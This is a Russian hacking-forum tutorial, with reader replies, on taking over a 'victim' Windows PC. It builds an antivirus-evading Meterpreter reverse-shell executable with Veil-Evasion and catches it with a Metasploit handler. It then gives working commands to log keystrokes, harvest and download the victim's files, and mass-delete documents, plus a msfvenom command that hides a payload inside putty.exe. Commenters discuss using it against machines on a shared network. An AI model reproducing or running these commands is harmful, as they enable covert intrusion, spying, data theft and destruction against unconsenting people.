Статья Взлом удаленного компьютера, Veil-Evasion, Metasploit

В этой статье, будет подробно описан взлом удаленного компьютера с использованием Kali Linux, Veil-Evasion, Metasploit.

UPDATE:
Поддержка Veil-Evasion закончилась, рекомендуется использовать фреймворк Veil.
https://codeby.net/threads/veil-framework.60978/


Ниже представлена схема, по которой будет осуществляться проникновение.

upload_2016-7-26_15-33-33.png


Необходимые ресурсы:
1. Kali Linux (Я использовал Kali GNU/Linux Rolling)

2. Статический белый IP (В моем случае Kali находится за NAT роутера с статическим адресом. Подключение к нашей машине извне будут идти на 443 порт. (В роутере он проброшен на локальный адрес Kali.) Использующие динамический адрес могут использовать DyDNS. (Не пробовал, но должно работать)
3. Veil-Evasion – фреймворк, с помощью которого мы попытаемся обойти антивирус, создадим файл с полезной нагрузкой в формате .exe.

Для начала необходимо установить Veil-Evasion. Чтобы программа создавала корректно работающие файлы, не рекомендую установку apt-get install Veil-Evasion. Фреймворк нужно клонировать c github.com.
Выполните в терминале следующее:
Код:
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup
setup.sh -c
Следим за установкой, соглашаемся и все устанавливаем.

Запускаем файл Veil-Evasion.py из терминала или из папки /root/Veil-Evasion.

upload_2016-7-26_15-34-5.png


Далее вводим команду list – она покажет список доступных payload.

upload_2016-7-26_15-34-57.png


Нас интересует номер 32python/meterpreter/reverse_https

Вводим - use 32

upload_2016-7-26_15-35-15.png


Задаем опции будущему файлу, вводим последовательно следующие команды:

set LHOST 83.199.12.XXX (Ваш публичный IP)

set LPORT 443 (По умолчанию HTTPS URL использует 443 TCP-порт (для незащищённого HTTP — 80).

set USE_PYHERION Y (используем энкриптор)

generate (создаем .exe файл)

Вводим имя создаваемого файла.

Выбираем вторую строку, жмем 2.

upload_2016-7-26_15-35-36.png


Ждем успешной генерации файла.

upload_2016-7-26_15-35-57.png


Созданный файл любым путем доставляем на компьютер жертвы. Весит немного, стандартными антивирусами Win7, Win8.1, Win10 не определялся.

Выходим из Veil-Evasion.

Запускаем Metasploit.
#msfconsole

Далее
Код:
msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (свой внутренний IP)
msf exploit (handler)  > set LPORT 443
msf exploit (handler) >exploit
Когда файл на компьютере жертвы будет запущен, вы увидите что открылась сессия meterpreter>.

upload_2016-7-26_15-37-23.png


Сразу советую мигрировать в другой процесс т.к. файл могут удалить, процесс завершится и т.д.

Делается это так, вводим:
ps – отобразится список активных процессов. Находим , например, explorer, смотрим его PID.

migrate (PID процесса).
Migration completed successfully.
Успех. Теперь необходимо повысить права в системе, команда:
getsystem (срабатывает не всегда.)
В целом поможет разобраться стандартная команда help.
Ниже пару моментов которые помогут быстрее освоиться в системе.

1. Кейлоггер
meterpreter > bgrun keylogrecorder

[*] Executed Meterpreter with Job ID 2
meterpreter > [*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.ххх.ххх_20111024.4455.txt #адрес лога
[*] Recording

meterpreter > bgkill 2 #отключаем кейлогер
[*] Killing background job 2...

2. Скрипт File_collector – позволит создавать список файлов имеющихся в определенном каталоге компьютера жертвы, редактировать его, и скачивать интересующие файлы себе.
Пример:
meterpreter > run file_collector -h
Затем создаем список файлов в одном каталоге:

run file_collector -r -d e:\\ -f * -o /root/ file.txt


Редактируем наш выходной файл, т.к. не все файлы нужны.
cat /root/file.txt | grep -v \DDD | grep -v \GCC | grep -v \GDB | grep -v \MAKE > file.lst


Скачиваем файлы на свой компьютер.

run file_collector -i /root /file.lst -l /root/

Полагаю не нужно обьяснять, что делают скрипты upload и download)

3. Используя скрипты scrapper и winenum можно собрать информацию о системе, которая сохранится на вашем локальном компьютере.

4. Удаление файлов. Команды вводятся в шелле.
Получаем его слудующим образом:
meterpreter >shell

Удаление файлов exe:
del e:\*.* /f /s /q

удаление файлов doc:
del e:\*.doc /f /s /q


удаление файлов pdf:
del e:\*.pdf /f /s /q


5. Командой приведенной ниже можно добавить payload в любой файл (определяется некоторыми антивирусами) При запуске на компьютере жертвы, откроется сессия meterpreter.

msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe

Краткое пояснение аргументов команды:
- a 86 - архитектура процессора.
--platform windows - тут понятно.
- x - указать пользовательский исполняемый файл для использования в качестве шаблона.
- k - сохранить поведение шаблона и ввести полезную нагрузку как новый поток.
- p - тип полезной нагрузки.
- e - тип енкодера.
- b - помечаем нулевой байт «плохим», то есть говорим, что его нужно избегать.
- f - формат выходного файла.

За пример взята putty находящаяся в директории /root.
LHOST и LPORT указываем свои.

Приведенный метод, хорошо справляется с взломом Win7, Win8, Win10, вопросы жду в комментариях. Если кто-то умеет криптовать файлы, интересно услышать его мнение.
 
Последнее редактирование:
С

сергей799

да все удалял и раза 2 пробывал переустанавливать такая же ситуация!
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
А скинь скрин содержимого папки source/common
 
С

сергей799

вот
[doublepost=1487926645,1487926349][/doublepost]ну что?
 

Вложения

  • Снимок экрана от 2017-02-24 11-51-36.png
    Снимок экрана от 2017-02-24 11-51-36.png
    68,4 КБ · Просмотры: 484

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Мимо... Заходим в папку source и в ней в common, и еще скрин
 
С

сергей799

это
[doublepost=1487927768,1487927656][/doublepost]вот еще
[doublepost=1487928229][/doublepost]бро посоветуй что сделать уже голова болит(
[doublepost=1487931502][/doublepost]вот
[doublepost=1488049964][/doublepost]бро теперь вот что он мне выдал!
 

Вложения

  • Снимок экрана от 2017-02-24 12-12-51.png
    Снимок экрана от 2017-02-24 12-12-51.png
    73,9 КБ · Просмотры: 331
  • Снимок экрана от 2017-02-24 12-15-18.png
    Снимок экрана от 2017-02-24 12-15-18.png
    64,4 КБ · Просмотры: 350
  • Снимок экрана от 2017-02-24 13-16-30.png
    Снимок экрана от 2017-02-24 13-16-30.png
    95,1 КБ · Просмотры: 183
  • Снимок экрана от 2017-02-25 22-05-51.png
    Снимок экрана от 2017-02-25 22-05-51.png
    94,4 КБ · Просмотры: 533

aserf

Green Team
29.12.2016
10
1
BIT
0
а если я сокс поставлю на кали, то как настраивать payload лпорт и лхост?заранее спасибо
 
D

darkrobot

ghbdttdd

Бан 24 часа. Администратор.
 
Последнее редактирование модератором:
R

RadoMIR

Win Server 2012 R2 - работает - отличная тема, особенно если недостучаться до удаленной машины через стандартные порты!
 
Z

zehrx

По поводу момента со статическим ip не совсем понял впринципе эту фразу:

2. Статический белый IP (В моем случае Kali находится за NAT роутера с статическим адресом. Подключение к нашей машине извне будут идти на 443 порт. (В роутере он проброшен на локальный адрес Kali.) Использующие динамический адрес могут использовать DyDNS. (Не пробовал, но должно работать)

Если машина жертвы в локальной сети я смогу воспользоваться маном? И если несложно можете подкинуть что-то по сетям, похоже у меня здесь жирный пробел.;)
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
По поводу момента со статическим ip не совсем понял впринципе эту фразу:



Если машина жертвы в локальной сети я смогу воспользоваться маном? И если несложно можете подкинуть что-то по сетям, похоже у меня здесь жирный пробел.;)
По сетям - это гугл, наверное. Мы не научим
 
R

RadoMIR

По поводу момента со статическим ip не совсем понял впринципе эту фразу:



Если машина жертвы в локальной сети я смогу воспользоваться маном? И если несложно можете подкинуть что-то по сетям, похоже у меня здесь жирный пробел.;)

Одна сеть имеется ввиду провайдер, или физически, допустим в пределах одного маршрутизатора, у вас c жертвой IP из одного диапазона или принадлежат одному VLAN`у если таковой имеется???
 
Z

zehrx

Одна сеть имеется ввиду провайдер, или физически, допустим в пределах одного маршрутизатора, у вас c жертвой IP из одного диапазона или принадлежат одному VLAN`у если таковой имеется???
Именно физически - в пределах одного роутера.
 
R

RadoMIR

Именно физически - в пределах одного роутера.

Эта ситуация говорит о том, что у Вас реальный или так называемый белый IP, в пределах одной сети
привожу пример:
вы подсоединены к одному роутеру: ВАШ IP 192.168.1.2 ------ у жертвы допустим 192.168.1.35 ----- можно спокойно атаковать на прямую IP жертвы, предварительно просканировав её порты или сразу как в статье - поднимая сервер прослушки на своем IP указаном в сетевых настройках - и вперед
 
  • Нравится
Реакции: Сергей Попов
Z

zehrx

Эта ситуация говорит о том, что у Вас реальный или так называемый белый IP, в пределах одной сети
привожу пример:
вы подсоединены к одному роутеру: ВАШ IP 192.168.1.2 ------ у жертвы допустим 192.168.1.35 ----- можно спокойно атаковать на прямую IP жертвы, предварительно просканировав её порты или сразу как в статье - поднимая сервер прослушки на своем IP указаном в сетевых настройках - и вперед
Благодарю, очень доступно, спасибо за разъяснение!
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!